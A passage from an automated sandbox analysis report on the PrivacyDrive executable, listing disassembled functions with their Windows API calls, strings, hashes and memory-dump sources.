                                • Instruction ID: 25f3e7894f02910a90036ffcbb16ce3f8a840d134bd79d6038c17c4fa65a3bde
                                • Opcode Fuzzy Hash: 014782290989219da5f6e7d60fa5059e811b8199ec2d4ddce0a92b82a47dd6ea
                                • Instruction Fuzzy Hash: BA41A071E00308DFCB00DFA4DC89AEEBBB4FB19315F10452AE511B3290D774A944CBA5
                                Function 00424260 Relevance: 19.5, APIs: 3, Strings: 8, Instructions: 236clipboardCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004FFCFE: _malloc.LIBCMT ref: 004FFD16
                                • OpenClipboard.USER32(00000000), ref: 004243DE
                                • GetClipboardData.USER32(00000001), ref: 004243EA
                                • CloseClipboard.USER32 ref: 004243F9
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Clipboard$CloseDataOpen_malloc
                                • String ID: COPY$CUT$DELETE$Item$Menu$PASTE$PDEDIT$SELECT_ALL
                                • API String ID: 3280518109-2570738062
                                • Opcode ID: 4d766201f953f0f62a6a44b19e5f2a713d3d091d040d9cb0aec08f6faf6e64eb
                                • Instruction ID: af0c7febff64a2cb770cd02584ed81d846506efae0f0cf1189369059b4be274b
                                • Opcode Fuzzy Hash: 4d766201f953f0f62a6a44b19e5f2a713d3d091d040d9cb0aec08f6faf6e64eb
                                • Instruction Fuzzy Hash: CE81C1703043009FE710DF229855B6BBAE4FB84754F00492EFA96963C1DBB4D9098BAA
                                Function 00477990 Relevance: 18.1, APIs: 12, Instructions: 84windowCOMMON
                                Download Yara Rule
                                APIs
                                • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,004B0DAD,?,?,?,?,00418323,?,?), ref: 004779BC
                                • GetWindowRect.USER32(00000000,?), ref: 004779C7
                                • GetCursorPos.USER32(?), ref: 004779D1
                                • ShowCursor.USER32(00000000,?,?,?,?,00418323,?,?), ref: 004779DF
                                • SetCursorPos.USER32(?,00418319,?,?,?,?,00418323,?,?), ref: 004779EF
                                • mouse_event.USER32(00008002,?,00418319,00000000,00000000), ref: 00477A12
                                • mouse_event.USER32(00008004,?,00418319,00000000,00000000), ref: 00477A2B
                                • SetCursorPos.USER32(?,?,?,?,?,?,00418323,?,?), ref: 00477A33
                                • ShowCursor.USER32(00000001,?,?,?,?,00418323,?,?), ref: 00477A3B
                                • SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000043,?,?,?,?,00418323,?,?), ref: 00477A4D
                                • SetForegroundWindow.USER32(?), ref: 00477A54
                                • SetFocus.USER32(?,?,?,?,?,00418323,?,?), ref: 00477A5B
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Cursor$Window$Showmouse_event$FocusForegroundRect
                                • String ID:
                                • API String ID: 2402844350-0
                                • Opcode ID: 17cf67ce4f21d185ae6256eb13231789ce43b5ca8ecd0f4c72bd89840be2a5d9
                                • Instruction ID: 35f5852f1461b2445c90fd6eb072ec157fbb865980a1f995b2d83013119948c3
                                • Opcode Fuzzy Hash: 17cf67ce4f21d185ae6256eb13231789ce43b5ca8ecd0f4c72bd89840be2a5d9
                                • Instruction Fuzzy Hash: 28213071A40319BFEF109B98ED86FAE77BCFB19716F100004F705FA2D1C664A9049B69
                                Function 0043E991 Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 267COMMON
                                Download Yara Rule
                                APIs
                                • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000100), ref: 0043EB5C
                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0043EB88
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: DiskFreeInformationSpaceVolume
                                • String ID: !@$CREATE_VOLUME$Dialog$LOCATE_PATH_INFO$NET_PATH_INFO$String$invalid string position
                                • API String ID: 3270478670-1935831191
                                • Opcode ID: 4b9d5ae12a441dfad8556cbf363f152831eab70e1e94889f7d5f6d733b2aeece
                                • Instruction ID: dc060d084ae7481b76c58541c8d08a526d08a5ad5d094ad849b10141f9d57912
                                • Opcode Fuzzy Hash: 4b9d5ae12a441dfad8556cbf363f152831eab70e1e94889f7d5f6d733b2aeece
                                • Instruction Fuzzy Hash: A4B19870208340DEE724DF25C899BABBBE5BF85704F50492EF19582291E7B9E848CB57
                                Function 0045D070 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 173fileCOMMON
                                Download Yara Rule
                                APIs
                                • swprintf.LIBCMT ref: 0045D0C2
                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,005BE234,75A8EB20,005783F0), ref: 0045D0E0
                                • DeviceIoControl.KERNEL32(00000000,00074080,00000000,00000000,?,00000018,?,00000000), ref: 0045D12A
                                • _memset.LIBCMT ref: 0045D16A
                                • DeviceIoControl.KERNEL32(00000000,0007C088,00000200,00000020,?,00000210,00000000,00000000), ref: 0045D1E9
                                • CloseHandle.KERNEL32(00000000), ref: 0045D29E
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ControlDevice$CloseCreateFileHandle_memsetswprintf
                                • String ID: 4[P[$4[P[$\\.\PhysicalDrive%d
                                • API String ID: 3128168039-1343652002
                                • Opcode ID: 995b0b6a9c7836ec1f9f514e6d2d7ddf075d870c64d39bc998f6d00fbd4d6d75
                                • Instruction ID: 1d6612d58995b57a00baa1f531f9c234147f1bdc39e549ac61d4751d187f5a77
                                • Opcode Fuzzy Hash: 995b0b6a9c7836ec1f9f514e6d2d7ddf075d870c64d39bc998f6d00fbd4d6d75
                                • Instruction Fuzzy Hash: 9A513B71E4031C9ADB20CB24CC85BEA77B4FF45700F1481E9E989A72C2DA755A89CF94
                                Function 00476750 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 121COMMON
                                Download Yara Rule
                                APIs
                                • LookupAccountNameW.ADVAPI32(00000000,?,?,00000064,?,?,00000001), ref: 004767B7
                                • GetSidIdentifierAuthority.ADVAPI32(?), ref: 004767C9
                                • GetSidSubAuthorityCount.ADVAPI32(?), ref: 004767E6
                                • GetSidSubAuthority.ADVAPI32(?,00000000), ref: 0047684A
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Authority$AccountCountIdentifierLookupName
                                • String ID: !@$%lu$P$S-1-%lu$d
                                • API String ID: 4104353294-1107859586
                                • Opcode ID: b655fc8ef84fcb31732102b16d4b07e836e98adce3f92c00db97f488b93166ca
                                • Instruction ID: 4c0d7b7dcbf8e319412ba715ebb94211a9b64f87439bb915675130a803821b7e
                                • Opcode Fuzzy Hash: b655fc8ef84fcb31732102b16d4b07e836e98adce3f92c00db97f488b93166ca
                                • Instruction Fuzzy Hash: F441C1719016189BDB20DF65CC49BDEB7F8FF05304F1186AAE519A3290E7346B48CF91
                                Function 004D3270 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52COMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,00410725,?,00000000), ref: 004D3286
                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,00410725,?,00000000), ref: 004D328D
                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 004D32A9
                                • CloseHandle.KERNEL32(?), ref: 004D32B6
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 004D32E2
                                • CloseHandle.KERNEL32(?), ref: 004D32EB
                                • GetLastError.KERNEL32 ref: 004D32F1
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CloseHandleProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                • String ID: SeDebugPrivilege
                                • API String ID: 3435690185-2896544425
                                • Opcode ID: be123d20fa19872550351cc9b7dea758de74ab990b1cd2a2551b9cda6699abe5
                                • Instruction ID: 9061d5ce5d7778e8bc93044a28d0dfe5c08405113d4df04e15f21e32a4d0d05f
                                • Opcode Fuzzy Hash: be123d20fa19872550351cc9b7dea758de74ab990b1cd2a2551b9cda6699abe5
                                • Instruction Fuzzy Hash: 80115275A4030DABDB00AFB0DC1EBBE7B79FB15702F104059F905E61E0DA705908EB55
                                Function 00422070 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 121keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • GetKeyState.USER32(00000011), ref: 004220AD
                                • GetKeyState.USER32(00000012), ref: 004220C9
                                • GetKeyState.USER32(00000010), ref: 004220E1
                                • GetKeyState.USER32(00000011), ref: 004220FA
                                • GetKeyState.USER32(00000012), ref: 0042211B
                                • GetKeyState.USER32(00000010), ref: 0042213C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: State
                                • String ID: N/A
                                • API String ID: 1649606143-2525114547
                                • Opcode ID: 58b50a0c3e48e1489f749ce2695fbba5d93f518a211508e8727432d17dfcf3b9
                                • Instruction ID: df62c2d8d3cb7637959c9b5c41f206f96db34c0fe90884c921772fc30bfac8c6
                                • Opcode Fuzzy Hash: 58b50a0c3e48e1489f749ce2695fbba5d93f518a211508e8727432d17dfcf3b9
                                • Instruction Fuzzy Hash: B931EA3530122777DF3C8928ED50FFFB265AB41380F85402FDA4696390CEF86851D659
                                Function 00485BE0 Relevance: 10.6, APIs: 7, Instructions: 118timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetLocaleInfoW.KERNEL32(00000400,0000001F,00000000,00000000,00000001,?,00000149), ref: 00485C0F
                                • GetLocaleInfoW.KERNEL32(00000400,0000001F,00000000,?), ref: 00485C56
                                • GetLocaleInfoW.KERNEL32(00000400,00001003,00000000,00000000), ref: 00485C68
                                • GetLocaleInfoW.KERNEL32(00000400,00001003,00000000,?), ref: 00485CB2
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00485CC5
                                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000020), ref: 00485CE2
                                • GetTimeFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000020), ref: 00485CFC
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: InfoLocale$Time$Format$DateFileSystem
                                • String ID:
                                • API String ID: 2974610873-0
                                • Opcode ID: 4563362470292cecad5032762e8ca6f054528bda2ec2bf46212665ea0baf6bfe
                                • Instruction ID: 1ff3375a3e700c5923e681f062513e789ee81be900efd369fa8ee989fe92dd05
                                • Opcode Fuzzy Hash: 4563362470292cecad5032762e8ca6f054528bda2ec2bf46212665ea0baf6bfe
                                • Instruction Fuzzy Hash: 4A31CE72B413186FEB249B619C0AFAF7A7CEF45701F008079BB09E62D1DA744D45CB65
                                Function 0052D130 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45encryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptAcquireContextA.ADVAPI32(?,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000020,?,?,?,0052D081,?,00000000), ref: 0052D154
                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000028,?,?,0052D081,?,00000000), ref: 0052D16B
                                • CryptGenRandom.ADVAPI32(00000000,?,00000000,?,?,0052D081,?,00000000), ref: 0052D17B
                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,0052D081,?,00000000), ref: 0052D18B
                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,0052D081,?,00000000), ref: 0052D198
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Crypt$Context$AcquireRelease$Random
                                • String ID: Microsoft Base Cryptographic Provider v1.0
                                • API String ID: 3586192267-291530887
                                • Opcode ID: f9fb1fd96296513a19a0fb0b5989b8f15f5e9bbd83fbc89c04d3d9c56315c62b
                                • Instruction ID: 413c3628df44866d44bf2ce7f88935014fbe02c43720695b9fcd4a057f8b2346
                                • Opcode Fuzzy Hash: f9fb1fd96296513a19a0fb0b5989b8f15f5e9bbd83fbc89c04d3d9c56315c62b
                                • Instruction Fuzzy Hash: F0F0813164131DBBEF108B94DE49F9A7B7CEB09761F100041F908F2590D6B19E54DBA0
                                Function 004CDA40 Relevance: 9.4, APIs: 6, Instructions: 424windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(00000000), ref: 004CDAFE
                                • GetWindowRect.USER32(?,?), ref: 004CDC02
                                • IsIconic.USER32(00000000), ref: 004CDD25
                                • GetWindowRect.USER32(?,?), ref: 004CDE18
                                • PostMessageW.USER32(?,000019E2,00000000,00000000), ref: 004CDEAD
                                • IsZoomed.USER32(00000000), ref: 004CDFA4
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: MessageRectWindow$IconicPostSendZoomed
                                • String ID:
                                • API String ID: 1145140692-0
                                • Opcode ID: 60d189e479d4d4d89f9d0624bef29c5f4cca929353394832c412b226bd43be11
                                • Instruction ID: 429b9f1bb229582ca2775421ba2a5e2d946bea9619cb803b1280a95a33c5cbac
                                • Opcode Fuzzy Hash: 60d189e479d4d4d89f9d0624bef29c5f4cca929353394832c412b226bd43be11
                                • Instruction Fuzzy Hash: D0E18178B042049BD768DF25C859F7AB7A5FF84314F10082FF5568B291CB79AC01DB9A
                                Function 0040D0B0 Relevance: 9.0, APIs: 6, Instructions: 42synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • WaitForSingleObject.KERNEL32(?), ref: 0040D0DD
                                • EnterCriticalSection.KERNEL32(?), ref: 0040D0E9
                                • RpcBindingFree.RPCRT4(005C0BE4), ref: 0040D0FA
                                • LeaveCriticalSection.KERNEL32(?), ref: 0040D112
                                • SetEvent.KERNEL32(?), ref: 0040D11B
                                • CloseHandle.KERNEL32(?), ref: 0040D124
                                  • Part of subcall function 0040CDF0: EnterCriticalSection.KERNEL32(?,7563D392), ref: 0040CE2C
                                  • Part of subcall function 0040CDF0: RpcStringBindingComposeW.RPCRT4(00000000,ncacn_ip_tcp,localhost,9382,00000000,00000000), ref: 0040CE5A
                                  • Part of subcall function 0040CDF0: RpcBindingFromStringBindingW.RPCRT4(00000000,005C0BE4), ref: 0040CE70
                                  • Part of subcall function 0040CDF0: RpcStringFreeW.RPCRT4(00000000), ref: 0040CE7E
                                  • Part of subcall function 0040CDF0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,00503130,005938C8,000000FE), ref: 0040CF1C
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: BindingCriticalSection$String$EnterFreeLeave$CloseComposeEventFromHandleObjectSingleWait
                                • String ID:
                                • API String ID: 1618485030-0
                                • Opcode ID: 49eb79fe447d7356ed6b4f90a1922c32806c2081b02803691e82cee08cb33607
                                • Instruction ID: 9dcba7a7c6c7c6fd4f9f0b95d0ac065d6fba7649e0196199bdaad57700265c64
                                • Opcode Fuzzy Hash: 49eb79fe447d7356ed6b4f90a1922c32806c2081b02803691e82cee08cb33607
                                • Instruction Fuzzy Hash: 0F017135000704DFD3219FA5ED08B6BFBF5FF6531AF00452AE55A926A0C7B9B84AEB44
                                Function 004D3220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32COMMON
                                Download Yara Rule
                                APIs
                                • FindResourceW.KERNEL32(00000000,00000000,BIN,?,?,0042BFB6,?), ref: 004D322B
                                • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0042BFB6,?), ref: 004D3242
                                • LoadResource.KERNEL32(00000000,00000000,?,?,?,0042BFB6,?), ref: 004D324D
                                • LockResource.KERNEL32(00000000,?,?,?,0042BFB6,?), ref: 004D3254
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
